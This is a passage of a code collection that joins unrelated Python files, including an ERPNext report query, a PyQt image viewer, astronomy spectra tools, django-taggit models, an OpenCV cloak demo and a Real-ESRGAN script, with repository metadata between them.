		if(
			soi.amount = soi.billed_amt,
			0,
			ifnull(soi.qty, 0) - ifnull(si.qty, 0)
		)
		from
			`tabSales Order Item` soi
			left join `tabSales Order` so on so.name = soi.parent
			left join (
				select
					tmr.docstatus,
					sum(if(tmr.docstatus = 1, tmri.qty, 0)) qty,
					sum(if(tmr.docstatus = 1, tmri.boxes, 0)) boxes,
					sum(if(tmr.docstatus = 1, tmri.pieces, 0)) pieces,
					tmri.sales_order,
					tmri.item_code,
					tmri.custom_warehouse_name
				from
					`tabMaterial Request` tmr
					inner join `tabMaterial Request Item` tmri on tmr.name = tmri.parent
				where
					tmri.sales_order is not null
				group by
					tmri.item_code,
					tmri.sales_order
			) mr on mr.sales_order = soi.parent
			and mr.item_code = soi.item_code
			left join (
				select
					se.docstatus,
					sum(if(se.docstatus = 1, sed.qty, 0)) qty,
					sum(if(se.docstatus = 1, sed.boxes, 0)) boxes,
					sum(if(se.docstatus = 1, sed.pieces, 0)) pieces,
					sed.sales_order,
					sed.item_code,
					sed.s_warehouse,
					sed.t_warehouse
				from
					`tabStock Entry Detail` sed
					inner join `tabStock Entry` se on sed.parent = se.name
				where
					sed.sales_order is not null
					and se.posting_date >= %(from_date) s
					and sed.t_warehouse like '%%Transit%%'
				group by
					sed.item_code,
					sed.sales_order,
					sed.s_warehouse
			) as sed on sed.item_code = soi.item_code
			and sed.sales_order = soi.parent
			left join (
				select
					si.docstatus,
					sum(if(si.docstatus = 1, sii.qty, 0)) qty,
					sum(if(si.docstatus = 1, sii.boxes, 0)) boxes,
					sum(if(si.docstatus = 1, sii.pieces, 0)) pieces,
					sii.sales_order,
					sii.item_code,
					sii.warehouse
				from
					`tabSales Invoice Item` sii
					inner join `tabSales Invoice` si on sii.parent = si.name
				where
					sii.sales_order is not null
					and si.posting_date >= %(from_date) s
					and si.is_return != 1
				group by
					sii.item_code,
					sii.sales_order
			) as si on si.item_code = soi.item_code
			and si.sales_order = soi.parent
		where
			so.docstatus = 1
			and so.status not in ('Closed')
			and so.transaction_date >= %(from_date) s
			and so.transaction_date <= %(to_date) s
			{conditions}
		order by
			so.transaction_date desc
	""".format(conditions=conditions), filters, as_dict=False)
    return sos
def get_columns():
    """Build the report column definitions as "Label:Fieldtype:Width"."""
    specs = [
        ("Bill No", "Link/Sales Order", 100),
        ("Created By", "Link/User", 100),
        ("Customer", "Data", 110),
        ("Date", "Date", 80),
        ("Code", "Link/Item", 70),
        ("Item Name", "Data", 200),
        ("(SO)SQM", "Float", 70),
        ("(SO)Boxes", "Int", 70),
        ("(SO)Pieces", "Int", 70),
        ("(RQ)SQM", "Int", 70),
        ("(RQ)Boxes", "Int", 70),
        ("(RQ)Pieces", "Int", 70),
        ("(SE)Status", "Data", 100),
        ("(SE)QM", "Float", 70),
        ("(SE)Boxes", "Int", 70),
        ("(SE)Pieces", "Int", 70),
        ("Deliverd", "Float", 70),
        ("Remaining", "Float", 70),
    ]
    # Labels go through frappe's `_` translation, exactly as before.
    return [_(label) + ":{0}:{1}".format(fieldtype, width)
            for label, fieldtype, width in specs]
780e62907c55203979929948b774220550b2d613 | 11,289 | py | Python | trash/image_viewer_mod_aug29.py | Zedd1558/Image-Inpainter | c8a78443bbbc31dd790a691c58639de295575f78 | [
"MIT"
] | 6 | 2020-09-15T03:10:53.000Z | 2021-02-21T02:43:51.000Z | trash/image_viewer_mod_aug29.py | Zedd1558/Image-Inpainter | c8a78443bbbc31dd790a691c58639de295575f78 | [
"MIT"
] | 2 | 2020-09-15T13:35:24.000Z | 2020-10-20T15:22:28.000Z | trash/image_viewer_mod_aug29.py | Zedd1558/Inpainter | 6865a0396696f6307ec283ebde35d722091a5963 | [
"MIT"
] | null | null | null | """ QtImageViewer.py: PyQt image viewer widget for a QPixmap in a QGraphicsView scene with mouse zooming and panning.
"""
import os.path
try:
from PyQt5.QtCore import Qt, QRectF, pyqtSignal, QT_VERSION_STR, QPoint
from PyQt5.QtGui import QImage, QPixmap, QPainterPath, QPen, QPainter
from PyQt5.QtWidgets import QGraphicsView, QGraphicsScene, QFileDialog
except ImportError:
try:
from PyQt4.QtCore import Qt, QRectF, pyqtSignal, QT_VERSION_STR
from PyQt4.QtGui import QGraphicsView, QGraphicsScene, QImage, QPixmap, QPainterPath, QFileDialog
except ImportError:
raise ImportError("QtImageViewer: Requires PyQt5 or PyQt4.")
__author__ = "Marcel Goldschen-Ohm <marcel.goldschen@gmail.com>"
__version__ = '0.9.0'
class QtImageViewer(QGraphicsView):
    """ PyQt image viewer widget for a QPixmap in a QGraphicsView scene with mouse zooming, panning and freehand drawing.

    Displays a QImage or QPixmap (QImage is internally converted to a QPixmap).
    To display any other image format, you must first convert it to a QImage or QPixmap.

    Some useful image format conversion utilities:
        qimage2ndarray: NumPy ndarray <==> QImage    (https://github.com/hmeine/qimage2ndarray)
        ImageQt: PIL Image <==> QImage  (https://github.com/python-pillow/Pillow/blob/master/PIL/ImageQt.py)

    Mouse interaction in zoom mode (self.zoomMode):
        Left mouse button drag: Pan image.
        Right mouse button drag: Zoom box.
        Right mouse button doubleclick: Zoom to show entire image.
    Mouse interaction in draw mode (self.drawMode, the default):
        Left mouse button drag: paint on the image with the current brush.
    """

    def __init__(self, scene, parent=None):
        super().__init__(parent)
        self.setScene(scene)
        self.scene = scene

        # Local handle to the scene's current image pixmap item.
        self._pixmapHandle = None

        # Aspect ratio mode — ONLY applies to the full-image view; aspect
        # ratio is always ignored when zoomed.
        #   Qt.IgnoreAspectRatio: Scale image to fit viewport.
        #   Qt.KeepAspectRatio: Scale image to fit inside viewport, preserving aspect ratio.
        #   Qt.KeepAspectRatioByExpanding: Scale image to fill the viewport, preserving aspect ratio.
        self.aspectRatioMode = Qt.KeepAspectRatio

        # Scroll bars appear only while zoomed in.
        self.setHorizontalScrollBarPolicy(Qt.ScrollBarAsNeeded)
        self.setVerticalScrollBarPolicy(Qt.ScrollBarAsNeeded)

        # Stack of QRectF zoom boxes in scene coordinates (last = current zoom).
        self.zoomStack = []

        # Flags for enabling/disabling mouse interaction.
        self.zoomMode = False
        self.drawMode = True
        self.canZoom = True
        self.canPan = True

        # Freehand drawing state.
        self.drawing = False
        self.brushSize = 2
        self.brushColor = Qt.red
        self.lastPoint = QPoint()

    def hasImage(self):
        """ Returns whether or not the scene contains an image pixmap.
        """
        return self._pixmapHandle is not None

    def clearImage(self):
        """ Removes the current image pixmap from the scene if it exists.
        """
        if self.hasImage():
            self.scene.removeItem(self._pixmapHandle)
            self._pixmapHandle = None

    def pixmap(self):
        """ Returns the scene's current image pixmap as a QPixmap, or else None if no image exists.
        :rtype: QPixmap | None
        """
        if self.hasImage():
            return self._pixmapHandle.pixmap()
        return None

    def image(self):
        """ Returns the scene's current image pixmap as a QImage, or else None if no image exists.
        :rtype: QImage | None
        """
        if self.hasImage():
            return self._pixmapHandle.pixmap().toImage()
        return None

    def setImage(self, image):
        """ Set the scene's current image pixmap to the input QImage or QPixmap.
        Raises a RuntimeError if the input image has type other than QImage or QPixmap.
        :type image: QImage | QPixmap
        """
        if type(image) is QPixmap:
            pixmap = image
        elif type(image) is QImage:
            pixmap = QPixmap.fromImage(image)
        else:
            raise RuntimeError("ImageViewer.setImage: Argument must be a QImage or QPixmap.")
        if self.hasImage():
            self._pixmapHandle.setPixmap(pixmap)
        else:
            self._pixmapHandle = self.scene.addPixmap(pixmap)
        self.setSceneRect(QRectF(pixmap.rect()))  # Set scene size to image size.
        self.updateViewer()

    def loadImageFromFile(self, fileName=""):
        """ Load an image from file.
        Without any arguments, loadImageFromFile() will popup a file dialog to choose the image file.
        With a fileName argument, loadImageFromFile(fileName) will attempt to load the specified image file directly.
        """
        if len(fileName) == 0:
            # PyQt4 returns the file name directly; PyQt5 returns (name, filter).
            if QT_VERSION_STR[0] == '4':
                fileName = QFileDialog.getOpenFileName(self, "Open image file.")
            elif QT_VERSION_STR[0] == '5':
                fileName, dummy = QFileDialog.getOpenFileName(self, "Open image file.")
        if len(fileName) and os.path.isfile(fileName):
            image = QImage(fileName)
            self.setImage(image)

    def updateViewer(self):
        """ Show current zoom (if showing entire image, apply current aspect ratio mode).
        """
        if not self.hasImage():
            return
        if len(self.zoomStack) and self.sceneRect().contains(self.zoomStack[-1]):
            self.fitInView(self.zoomStack[-1], Qt.IgnoreAspectRatio)  # Show zoomed rect (ignore aspect ratio).
        else:
            self.zoomStack = []  # Clear the zoom stack (in case we got here because of an invalid zoom).
            self.fitInView(self.sceneRect(), self.aspectRatioMode)  # Show entire image (use current aspect ratio mode).

    def resizeEvent(self, event):
        """ Maintain current zoom on resize.
        """
        self.updateViewer()

    def mouseMoveEvent(self, event):
        """ Paint while the left button is held (draw mode); delegate to the
        base class in zoom mode so drag modes track the mouse.
        """
        if self.drawMode:
            # BUGFIX: the left-button check must mask the buttons flag with
            # `&`; the original `event.buttons() and Qt.LeftButton` was truthy
            # whenever ANY button was pressed.
            if (event.buttons() & Qt.LeftButton) and self.drawing:
                # Scene coordinates map 1:1 onto pixmap coordinates because
                # the pixmap item sits at the scene origin.
                pixmap = self.pixmap()
                painter = QPainter(pixmap)
                painter.setRenderHint(QPainter.Antialiasing, True)
                painter.setPen(QPen(self.brushColor, self.brushSize,
                                    Qt.SolidLine, Qt.RoundCap, Qt.RoundJoin))
                painter.drawLine(self.lastPoint, self.mapToScene(event.pos()))
                painter.end()
                self.lastPoint = self.mapToScene(event.pos())
                self._pixmapHandle.setPixmap(pixmap)
                self.update()
        if self.zoomMode:
            # BUGFIX: forward to QGraphicsView so ScrollHandDrag panning and
            # RubberBandDrag selection actually follow the mouse (the
            # original branch was `pass`, which froze both drag modes).
            QGraphicsView.mouseMoveEvent(self, event)

    def mousePressEvent(self, event):
        """ Start mouse pan or zoom mode.
        """
        if self.zoomMode:
            if event.button() == Qt.LeftButton:
                if self.canPan:
                    self.setDragMode(QGraphicsView.ScrollHandDrag)
            elif event.button() == Qt.RightButton:
                if self.canZoom:
                    self.setDragMode(QGraphicsView.RubberBandDrag)
            QGraphicsView.mousePressEvent(self, event)
        if self.drawMode:
            if event.button() == Qt.LeftButton:
                self.drawing = True
                self.lastPoint = self.mapToScene(event.pos())

    def mouseReleaseEvent(self, event):
        """ Stop mouse pan or zoom mode (apply zoom if valid).
        """
        if self.zoomMode:
            QGraphicsView.mouseReleaseEvent(self, event)
            if event.button() == Qt.LeftButton:
                self.setDragMode(QGraphicsView.NoDrag)
            elif event.button() == Qt.RightButton:
                if self.canZoom:
                    # Intersect the rubber-band selection with the visible
                    # region and push it as the new zoom rect.
                    viewBBox = self.zoomStack[-1] if len(self.zoomStack) else self.sceneRect()
                    selectionBBox = self.scene.selectionArea().boundingRect().intersected(viewBBox)
                    self.scene.setSelectionArea(QPainterPath())  # Clear current selection area.
                    if selectionBBox.isValid() and (selectionBBox != viewBBox):
                        self.zoomStack.append(selectionBBox)
                        self.updateViewer()
                self.setDragMode(QGraphicsView.NoDrag)
        if self.drawMode:
            if event.button() == Qt.LeftButton:
                self.drawing = False

    def mouseDoubleClickEvent(self, event):
        """ Show entire image (right doubleclick resets the zoom stack).
        """
        if self.zoomMode:
            if event.button() == Qt.RightButton:
                if self.canZoom:
                    self.zoomStack = []  # Clear zoom stack.
                    self.updateViewer()
        QGraphicsView.mouseDoubleClickEvent(self, event)
if __name__ == '__main__':
    # Demo entry point: open a file dialog, show the chosen image in a
    # QtImageViewer.  Works with either PyQt5 or PyQt4.
    import sys
    try:
        from PyQt5.QtWidgets import QApplication
    except ImportError:
        try:
            from PyQt4.QtGui import QApplication
        except ImportError:
            raise ImportError("QtImageViewer: Requires PyQt5 or PyQt4.")
    print('Using Qt ' + QT_VERSION_STR)
    def handleLeftClick(x, y):
        """Example click handler: print the clicked image pixel (unused by
        default -- see the commented connect() below)."""
        row = int(y)
        column = int(x)
        print("Clicked on image pixel (row="+str(row)+", column="+str(column)+")")
    # Create the application.
    app = QApplication(sys.argv)
    # Create image viewer and load an image file to display.
    scene = QGraphicsScene()
    viewer = QtImageViewer(scene)
    viewer.loadImageFromFile() # Pops up file dialog.
    # Handle left mouse clicks with custom slot.
    # viewer.leftMouseButtonPressed.connect(handleLeftClick)
    # Show viewer and run application.
    viewer.show()
    sys.exit(app.exec_())
71d693f61b624df5fe568391e0c680d9c46b0192 | 1,778 | py | Python | wisps/simulations/combine_templates.py | caganze/wisps | 6572201f94a6af6d1c0a306f2f447215d4330bd7 | [
"MIT"
] | null | null | null | wisps/simulations/combine_templates.py | caganze/wisps | 6572201f94a6af6d1c0a306f2f447215d4330bd7 | [
"MIT"
] | 7 | 2021-02-02T21:51:56.000Z | 2022-01-13T00:57:45.000Z | wisps/simulations/combine_templates.py | caganze/wisps | 6572201f94a6af6d1c0a306f2f447215d4330bd7 | [
"MIT"
] | null | null | null | ##purpose: combines object spectral type and then reclassify them
##scaled to their absolute magnitudes
import splat
import wisps
import pandas as pd
import numpy as np
from itertools import combinations
from tqdm import tqdm
import splat.empirical as spe
from concurrent.futures import ThreadPoolExecutor, wait , ALL_COMPLETED
from functools import partial
def proper_classification(sp):
    """Classify a spectrum against the SpeX spectral standards.

    Thin wrapper around ``wisps.classify`` with units stripped from the
    returned classification.
    """
    return wisps.classify(sp, stripunits=True)
def combine_two_spectra(sp10, sp20):
    """Combine two template spectra into a synthetic binary and classify it.

    Each input spectrum is flux-calibrated to the absolute 2MASS H magnitude
    implied by its spectral type, the two are summed, and the sum is
    re-classified.

    Args:
        sp10, sp20: wisps template objects exposing ``splat_spectrum`` and
            ``spectral_type``.

    Returns:
        dict with keys ``primary`` (the two input spectral types),
        ``system`` (classification of the summed spectrum) and ``spectrum``
        (the combined splat spectrum); an empty dict when calibration or
        addition fails.
    """
    sp1 = sp10.splat_spectrum
    sp2 = sp20.splat_spectrum
    absj0 = (wisps.absolute_magnitude_jh(wisps.make_spt_number(sp10.spectral_type[0]))[1]).flatten()[0]
    absj1 = (wisps.absolute_magnitude_jh(wisps.make_spt_number(sp20.spectral_type[0]))[1]).flatten()[0]
    try:
        sp1.fluxCalibrate('2MASS H', absj0)
        sp2.fluxCalibrate('2MASS H', absj1)
        sp3 = sp1 + sp2
        return {'primary': [sp10.spectral_type, sp20.spectral_type],
                'system': proper_classification(sp3),
                'spectrum': sp3}
    except Exception:
        # BUGFIX: was a bare `except:`, which also swallowed SystemExit and
        # KeyboardInterrupt and made the thread pool uninterruptible.
        return {}
def make_binaries():
    """Build every pairwise binary template from the SpeX templates pickle
    and write the combined records to OUTPUT_FILES/binary_templates.pkl."""
    templates_df = pd.read_pickle(wisps.OUTPUT_FILES + '/binary_spex.pkl')
    spectra = templates_df.spectra
    # Two parallel argument columns: first and second member of each pair.
    pair_columns = list(np.array([(x, y) for x, y in tqdm(combinations(spectra, 2))]).T)
    with ThreadPoolExecutor(max_workers=100) as executor:
        mapped = executor.map(combine_two_spectra, *pair_columns, timeout=None, chunksize=10)
        records = list(mapped)
    frame = pd.DataFrame.from_records(records)
    frame.to_pickle(wisps.OUTPUT_FILES + '/binary_templates.pkl')
if __name__=='__main__':
make_binaries() | 26.939394 | 101 | 0.705849 |
ad5a43a70eccb7bd46919eeba3e3e27f5ba35ac1 | 1,083 | py | Python | pyvisdk/do/vim_esx_cl_iiscsiadapterauthchapget_adapter_chap_auth.py | Infinidat/pyvisdk | f2f4e5f50da16f659ccc1d84b6a00f397fa997f8 | [
"MIT"
] | null | null | null | pyvisdk/do/vim_esx_cl_iiscsiadapterauthchapget_adapter_chap_auth.py | Infinidat/pyvisdk | f2f4e5f50da16f659ccc1d84b6a00f397fa997f8 | [
"MIT"
] | null | null | null | pyvisdk/do/vim_esx_cl_iiscsiadapterauthchapget_adapter_chap_auth.py | Infinidat/pyvisdk | f2f4e5f50da16f659ccc1d84b6a00f397fa997f8 | [
"MIT"
] | null | null | null |
import logging
from pyvisdk.exceptions import InvalidArgumentError
# This module is NOT auto-generated
# Inspired by decompiled Java classes from vCenter's internalvim25stubs.jar
# Unless states otherside, the methods and attributes were not used by esxcli,
# and thus not tested
log = logging.getLogger(__name__)
def VimEsxCLIiscsiadapterauthchapgetAdapterChapAuth(vim, *args, **kwargs):
    """Build the SOAP request object for `esxcli iscsi adapter auth chap get`.

    Positional args fill the optional fields in declared order; keyword
    args must match one of the declared field names, otherwise
    InvalidArgumentError is raised.
    """
    obj = vim.client.factory.create('{urn:vim25}VimEsxCLIiscsiadapterauthchapgetAdapterChapAuth')
    # do some validation checking...
    # NOTE(review): this generated guard can never fire -- a sum of lengths
    # is always >= 0 -- so the arity is effectively unchecked.
    if (len(args) + len(kwargs)) < 0:
        raise IndexError('Expected at least 1 arguments got: %d' % len(args))
    required = [ ]
    optional = [ 'Adapter', 'Direction', 'Level', 'Name' ]
    # Map positional arguments onto the field names in declaration order.
    for name, arg in zip(required + optional, args):
        setattr(obj, name, arg)
    for name, value in kwargs.items():
        if name in required + optional:
            setattr(obj, name, value)
        else:
            raise InvalidArgumentError("Invalid argument: %s. Expected one of %s" % (name, ", ".join(required + optional)))
return obj | 34.935484 | 124 | 0.690674 |
909ad63681f0a3344e401120bec3de6a3e879d5e | 1,914 | py | Python | reveries/scripts/deadline_extract.py | davidlatwe/reveries-config | 4a282dd64a32a9b87bd1a070759b6425ff785d68 | [
"MIT"
] | 3 | 2020-04-01T10:51:17.000Z | 2021-08-05T18:35:23.000Z | reveries/scripts/deadline_extract.py | davidlatwe/reveries-config | 4a282dd64a32a9b87bd1a070759b6425ff785d68 | [
"MIT"
] | null | null | null | reveries/scripts/deadline_extract.py | davidlatwe/reveries-config | 4a282dd64a32a9b87bd1a070759b6425ff785d68 | [
"MIT"
] | 1 | 2020-07-05T12:06:30.000Z | 2020-07-05T12:06:30.000Z |
import os
import sys
import logging
import json
import pyblish.api
import pyblish.lib
def get_plugin(classname):
    """Return the registered pyblish plugin class named ``classname``.

    Raises:
        ValueError: when no discovered plugin matches ``classname``.
    """
    # next() with a generator stops at the first match instead of scanning on.
    plugin = next(
        (p for p in pyblish.api.discover() if p.__name__ == classname),
        None,
    )
    if plugin is None:
        # BUGFIX: was `assert Plugin, ...` -- assertions are stripped under
        # `python -O`, which would silently return None and crash the caller
        # later.  Raise explicitly instead.
        raise ValueError("Pyblish plugin %r not found." % classname)
    return plugin
def deadline_extract():
    """Generator that replays every extractor dump queued by Deadline.

    Reads the semicolon-separated list of JSON dump paths from the
    PYBLISH_EXTRACTOR_DUMPS environment variable.  Each dump names a
    pyblish plugin class plus the method and arguments to call on it.
    The plugin class is yielded *before* the export runs so the caller
    can attribute any subsequent failure to it.
    """
    dumps = os.environ["PYBLISH_EXTRACTOR_DUMPS"].split(";")
    for path in dumps:
        with open(path, "r") as file:
            data = json.load(file)
        args = data["args"]
        kwargs = data["kwargs"]
        classname = data["class"]
        function = data["func"]
        Plugin = get_plugin(classname)
        yield Plugin  # For debug/error message
        # Export
        plugin = Plugin()
        if (classname == "ExtractArnoldStandIn"
                and "maya" in Plugin.hosts):
            # Set frame range from Deadline task (Maya Only)
            # Imported lazily: `maya.mel` only exists inside a Maya session.
            from maya import mel
            start = int(mel.eval("DeadlineValue(\"StartFrame\")"))
            end = int(mel.eval("DeadlineValue(\"EndFrame\")"))
            kwargs["start"] = start
            kwargs["end"] = end
        extractor = getattr(plugin, function)
        extractor(*args, **kwargs)
if __name__ == "__main__":
log = logging.getLogger("Pyblish")
Plugin = None
try:
for Plugin in deadline_extract():
pass
except Exception as error:
if Plugin is None:
pyblish.lib.extract_traceback(error)
message = "Failed: {e} -- {e.traceback}"
else:
pyblish.lib.extract_traceback(error, Plugin.__module__)
message = "Failed {p.__name__}: {e} -- {e.traceback}"
log.error(message.format(p=Plugin, e=error))
log.error("Fatal Error: Errors occurred during extract, see log..")
sys.exit(2)
else:
print("All good. Success!")
| 25.52 | 75 | 0.577325 |
50b430207f97745d4db9a4df6556019facd73fad | 966 | py | Python | Invisibility Cloak/Cloak.py | Achyut-Saxena/OpenCV-Projects | d1c9bee943c62fa563555a6b4eb13926b81461d6 | [
"MIT"
] | null | null | null | Invisibility Cloak/Cloak.py | Achyut-Saxena/OpenCV-Projects | d1c9bee943c62fa563555a6b4eb13926b81461d6 | [
"MIT"
] | 1 | 2021-07-16T04:16:21.000Z | 2021-07-16T04:16:51.000Z | Invisibility Cloak/Cloak.py | Achyut-Saxena/OpenCV-Projects | d1c9bee943c62fa563555a6b4eb13926b81461d6 | [
"MIT"
] | null | null | null | import time
import cv2
import numpy as np

# "Invisibility cloak": capture a static background, then replace every
# green-cloak pixel in the live feed with the stored background.
cap = cv2.VideoCapture(0, cv2.CAP_DSHOW)

# Countdown so the user can step out of frame before the background is
# captured (sleep durations kept identical to the original timing).
print("Invisibility cloak starts working in:", end="")
for i in range(5):
    print(i+1, end=" ")
    time.sleep(i)

# Grab a number of warm-up frames and keep the last one as the background.
# BUGFIX/cleanup: the flip is done once after the loop -- the original
# flipped every frame, but each result was discarded by the next read.
background = 0
for _ in range(30):
    ret, background = cap.read()
background = np.flip(background, axis=1)

while True:
    ret, img = cap.read()
    img = np.flip(img, axis=1)  # mirror the feed so it behaves like a mirror
    hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)

    # HSV range matching the green cloak.
    green_low_lim = np.array([25, 52, 72])
    green_up_lim = np.array([102, 255, 255])

    # cloak_mask: cloak pixels; rest_mask: everything else.
    # Cleanup: the original computed the same inRange twice and summed the
    # copies into an unused variable -- that dead per-frame work is removed.
    cloak_mask = cv2.inRange(hsv, green_low_lim, green_up_lim)
    rest_mask = cv2.bitwise_not(cloak_mask)

    # Keep the live scene outside the cloak, paste the stored background
    # where the cloak is, and combine.
    res1 = cv2.bitwise_and(img, img, mask=rest_mask)
    res2 = cv2.bitwise_and(background, background, mask=cloak_mask)
    final_output = res1 + res2

    cv2.imshow("Cloak", final_output)
    k = cv2.waitKey(1) & 0xFF
    if k == 27:  # Esc exits
        break

cv2.destroyAllWindows()
cap.release()
| 27.6 | 62 | 0.666667 |
def4292d1ddcccdc68b5a09926601aa090feff4c | 5,308 | py | Python | taggit/models.py | makaimc/pfisdi | 45e897b374d50e2f5385f15cbf318da0e17900f7 | [
"MIT"
] | 2 | 2015-01-05T21:09:24.000Z | 2015-07-31T16:52:38.000Z | taggit/models.py | makaimc/pfisdi | 45e897b374d50e2f5385f15cbf318da0e17900f7 | [
"MIT"
] | null | null | null | taggit/models.py | makaimc/pfisdi | 45e897b374d50e2f5385f15cbf318da0e17900f7 | [
"MIT"
] | null | null | null | import django
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes.generic import GenericForeignKey
from django.db import models, IntegrityError, transaction
from django.template.defaultfilters import slugify as default_slugify
from django.utils.translation import ugettext_lazy as _, ugettext
from django.contrib.auth.models import User
class TagBase(models.Model):
    """Abstract base for tags: a display name plus a unique slug.

    Saving a new tag without a slug auto-generates one and, on a unique
    constraint violation, retries with a numeric suffix (``foo_1``,
    ``foo_2``, ...) until the save succeeds.
    """
    name = models.CharField(verbose_name=_('Name'), max_length=150)
    slug = models.SlugField(verbose_name=_('Slug'), unique=True, max_length=100)
    def __unicode__(self):
        return self.name
    class Meta:
        abstract = True
    def save(self, *args, **kwargs):
        # Only generate a slug for unsaved rows that do not have one yet;
        # existing rows save straight through.
        if not self.pk and not self.slug:
            self.slug = self.slugify(self.name)
            if django.VERSION >= (1, 2):
                from django.db import router
                using = kwargs.get("using") or router.db_for_write(
                    type(self), instance=self)
                # Make sure we write to the same db for all attempted writes,
                # with a multi-master setup, theoretically we could try to
                # write and rollback on different DBs
                kwargs["using"] = using
                trans_kwargs = {"using": using}
            else:
                trans_kwargs = {}
            i = 0
            while True:
                i += 1
                try:
                    # A savepoint lets us retry after a duplicate-slug
                    # IntegrityError without aborting any outer transaction.
                    sid = transaction.savepoint(**trans_kwargs)
                    res = super(TagBase, self).save(*args, **kwargs)
                    transaction.savepoint_commit(sid, **trans_kwargs)
                    return res
                except IntegrityError:
                    transaction.savepoint_rollback(sid, **trans_kwargs)
                    self.slug = self.slugify(self.name, i)
        else:
            return super(TagBase, self).save(*args, **kwargs)
    def slugify(self, tag, i=None):
        """Slugify ``tag``, appending ``_i`` when a dedup suffix is needed."""
        slug = default_slugify(tag)
        if i is not None:
            slug += "_%d" % i
        return slug
class Tag(TagBase):
    """Concrete tag model: a unique name/slug pair (see TagBase)."""
    class Meta:
        verbose_name = _("Tag")
        verbose_name_plural = _("Tags")
class ItemBase(models.Model):
    """Abstract base for "tagged item" through-models.

    Subclasses provide a ``tag`` ForeignKey and a ``content_object``
    reference; the classmethods below introspect those fields so managers
    can build queryset filters without knowing the concrete model.
    """
    def __unicode__(self):
        return ugettext("%(object)s tagged with %(tag)s") % {
            "object": self.content_object,
            "tag": self.tag
        }
    class Meta:
        abstract = True
    @classmethod
    def tag_model(cls):
        # The model class the `tag` ForeignKey points to.
        return cls._meta.get_field_by_name("tag")[0].rel.to
    @classmethod
    def tag_relname(cls):
        # The reverse accessor name of the `tag` ForeignKey.
        return cls._meta.get_field_by_name('tag')[0].rel.related_name
    @classmethod
    def lookup_kwargs(cls, instance):
        # Filter kwargs selecting the through-rows of one tagged instance.
        return {
            'content_object': instance
        }
    @classmethod
    def bulk_lookup_kwargs(cls, instances):
        # Filter kwargs selecting the through-rows of many tagged instances.
        return {
            "content_object__in": instances,
        }
class TaggedItemBase(ItemBase):
    """Abstract through-model whose ``content_object`` is a real ForeignKey
    declared on the subclass; only the ``tag`` FK is declared here."""
    # Older Django versions do not support %(app_label)s in related_name.
    if django.VERSION < (1, 2):
        tag = models.ForeignKey(Tag, related_name="%(class)s_items")
    else:
        tag = models.ForeignKey(Tag, related_name="%(app_label)s_%(class)s_items")
    class Meta:
        abstract = True
    @classmethod
    def tags_for(cls, model, instance=None):
        """Tags applied to ``instance``, or to any instance when None.

        NOTE(review): the ``model`` argument is unused in this override
        (the generic sibling uses it for its content-type filter).
        """
        if instance is not None:
            return cls.tag_model().objects.filter(**{
                '%s__content_object' % cls.tag_relname(): instance
            })
        return cls.tag_model().objects.filter(**{
            '%s__content_object__isnull' % cls.tag_relname(): False
        }).distinct()
class GenericTaggedItemBase(ItemBase):
    """Abstract through-model attaching tags to *any* model via the
    contenttypes framework (``content_type`` + ``object_id`` generic FK)."""
    object_id = models.IntegerField(verbose_name=_('Object id'), db_index=True)
    # Who applied the tag (nullable) and when the row was written.
    tag_creator = models.ForeignKey(User, null=True,
                                    related_name='%(app_label)s_%(class)s_related')
    create_timestamp = models.DateTimeField(auto_now=True)
    # Older Django versions do not support %(app_label)s in related_name.
    if django.VERSION < (1, 2):
        content_type = models.ForeignKey(
            ContentType,
            verbose_name=_('Content type'),
            related_name="%(class)s_tagged_items",
        )
    else:
        content_type = models.ForeignKey(
            ContentType,
            verbose_name=_('Content type'),
            related_name="%(app_label)s_%(class)s_tagged_items",
        )
    content_object = GenericForeignKey()
    class Meta:
        abstract=True
    @classmethod
    def lookup_kwargs(cls, instance):
        # A generic FK cannot be filtered on directly: match on pk + type.
        return {
            'object_id': instance.pk,
            'content_type': ContentType.objects.get_for_model(instance)
        }
    @classmethod
    def bulk_lookup_kwargs(cls, instances):
        # TODO: instances[0], can we assume there are instances.
        return {
            "object_id__in": [instance.pk for instance in instances],
            "content_type": ContentType.objects.get_for_model(instances[0]),
        }
    @classmethod
    def tags_for(cls, model, instance=None):
        # Tags applied to `model` (optionally restricted to one instance).
        ct = ContentType.objects.get_for_model(model)
        kwargs = {
            "%s__content_type" % cls.tag_relname(): ct
        }
        if instance is not None:
            kwargs["%s__object_id" % cls.tag_relname()] = instance.pk
        return cls.tag_model().objects.filter(**kwargs).distinct()
class TaggedItem(GenericTaggedItemBase, TaggedItemBase):
    """Concrete through-model combining the generic FK base
    (content_type/object_id) with the Tag FK from TaggedItemBase."""
    class Meta:
        verbose_name = _("Tagged Item")
        verbose_name_plural = _("Tagged Items")
| 31.784431 | 82 | 0.602675 |
e6a28163993f523934acac87efaaa3a72c0c3c24 | 6,444 | py | Python | inference_realesrgan.py | Gyudori/Real-ESRGAN | 388a477da5c2864faaba6680e926ddf16bc122eb | [
"BSD-3-Clause"
] | null | null | null | inference_realesrgan.py | Gyudori/Real-ESRGAN | 388a477da5c2864faaba6680e926ddf16bc122eb | [
"BSD-3-Clause"
] | null | null | null | inference_realesrgan.py | Gyudori/Real-ESRGAN | 388a477da5c2864faaba6680e926ddf16bc122eb | [
"BSD-3-Clause"
] | null | null | null | import argparse
import cv2
import glob
import os
import time
from basicsr.archs.rrdbnet_arch import RRDBNet
from realesrgan import RealESRGANer
from realesrgan.archs.srvgg_arch import SRVGGNetCompact
def print_elapsed_time(print_messeage, start_time):
    """Print *print_messeage* followed by the wall-clock time elapsed since
    *start_time* (a ``time.time()`` timestamp), formatted HH:MM:SS.ss."""
    elapsed = time.time() - start_time
    full_hours, remainder = divmod(elapsed, 3600)
    full_minutes, leftover_seconds = divmod(remainder, 60)
    stamp = "| elapsed time:{:0>2}:{:0>2}:{:05.2f}".format(
        int(full_hours), int(full_minutes), leftover_seconds)
    print(print_messeage, stamp)
def main():
    """Inference demo for Real-ESRGAN.

    Parses command-line options, instantiates the network matching the
    requested model name, then upscales every image found at ``--input``
    and writes the results into ``--output``.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('-i', '--input', type=str, default='inputs', help='Input image or folder')
    parser.add_argument(
        '-n',
        '--model_name',
        type=str,
        default='RealESRGAN_x4plus',
        help=('Model names: RealESRGAN_x4plus | RealESRNet_x4plus | RealESRGAN_x4plus_anime_6B | RealESRGAN_x2plus'
              'RealESRGANv2-anime-xsx2 | RealESRGANv2-animevideo-xsx2-nousm | RealESRGANv2-animevideo-xsx2'
